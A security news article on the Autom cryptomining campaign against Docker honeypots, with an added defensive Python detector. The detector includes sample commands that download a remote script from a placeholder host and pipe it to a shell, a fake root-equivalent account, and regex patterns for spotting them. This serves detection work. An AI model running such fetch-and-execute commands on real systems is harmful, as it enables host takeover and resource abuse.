Autom Cryptomining Malware Employs Upgraded Evasion Techniques

The malware has targeted 84 honeypot servers since 2019.

 

The malicious Autom cryptomining campaign has upgraded its arsenal and added new defense-evasion methods that let attackers fly under the radar of anti-virus scanning tools.

According to researchers at DevSecOps and cloud security firm AquaSecurity, the malicious campaign was first identified in 2019, and since then the researchers have recorded a total of 84 attacks against their honeypot servers, four of them in 2021.

Early attacks in this campaign executed a malicious command once a user ran the vanilla image "alpine:latest"; that command downloaded a shell script named "autom.sh" onto the host.

"Adversaries commonly use vanilla images along with malicious commands to perform their attacks, because most organizations trust the official images and allow their use," the researchers explained in a blog post. "Over the years, the malicious command that was added to the official image to carry out the attack has barely changed. The main difference is the server from which the shell script autom.sh was downloaded."

The shell script starts the attack sequence: it creates a new user account named "akay" and elevates that account to root privileges, enabling the attackers to run arbitrary commands on the compromised machine and, eventually, abuse its resources to mine cryptocurrency. In the early stages of the 2019 campaign the mining activity was not hidden at all, but later versions show the lengths to which its developers have gone to keep it out of sight of scanning tools.
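As an added defensive example that is not part of the original article or of Aqua Security's research: a small Python check that flags `docker run` invocations of a vanilla base image whose command pulls a remote shell script straight into a shell, and lists UID-0 accounts other than root in an /etc/passwd file. The log lines, the /etc/passwd excerpt and the host name c2.example.invalid are constructed sample data; the set of "vanilla" image names is an assumption.

```python
import re

# Constructed sample of "docker run" invocations as a container host's shell
# history or audit log might record them. The host c2.example.invalid is a placeholder.
SAMPLE_DOCKER_RUNS = [
    'docker run -d --name web nginx:latest',
    'docker run --rm alpine:latest echo hello',
    'docker run -d alpine:latest /bin/sh -c "wget -qO- http://c2.example.invalid/autom.sh | sh"',
    'docker run -d ubuntu:20.04 bash -c "curl -s http://c2.example.invalid/autom.sh | bash"',
]

# Constructed /etc/passwd excerpt containing a root-equivalent "akay" account.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
akay:x:0:0::/home/akay:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

# Official base images that attackers reuse because hosts already trust them (assumed list).
VANILLA_IMAGES = ("alpine", "busybox", "ubuntu", "debian")
IMAGE_RE = re.compile(r"\b(" + "|".join(VANILLA_IMAGES) + r")(?::[\w.-]+)?\b")
# wget/curl followed (within the same command) by an http(s) URL ending in .sh
FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^|;&]*?(https?://\S+\.sh)\b")
# the fetched script is piped into sh or bash
PIPE_SH_RE = re.compile(r"\|\s*(?:ba)?sh\b")


def suspicious_docker_runs(lines):
    """Return (image, url) for every run of a vanilla image whose command
    downloads a remote .sh script and pipes it into a shell."""
    hits = []
    for line in lines:
        if "docker run" not in line:
            continue
        image = IMAGE_RE.search(line)
        fetch = FETCH_RE.search(line)
        if image and fetch and PIPE_SH_RE.search(line):
            hits.append((image.group(0), fetch.group(1)))
    return hits


def root_equivalent_accounts(passwd_text):
    """Return the names of UID-0 accounts other than root in /etc/passwd text."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names
```

On a real host the same functions can be fed the output of the shell history or audit log and the contents of /etc/passwd; a non-root UID-0 account such as "akay" is a strong indicator of the escalation the script performs.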

Campaigns that hijack computers to mine cryptocurrency have been dominated by a handful of threat actors, such as Kinsing, which has been observed scanning the internet for misconfigured Docker servers, breaking into the unprotected hosts and installing a previously undocumented coin miner strain.

"Miners are a low-risk way for cybercriminals to turn a vulnerability into digital cash, with the greatest risk to their cash flow being competing miners discovering the same vulnerable servers," Sophos senior threat researcher Sean Gallagher explained in an analysis of a Tor2Mine mining campaign, which involves the use of a PowerShell script to disable malware protection, execute a miner payload, and harvest Windows credentials.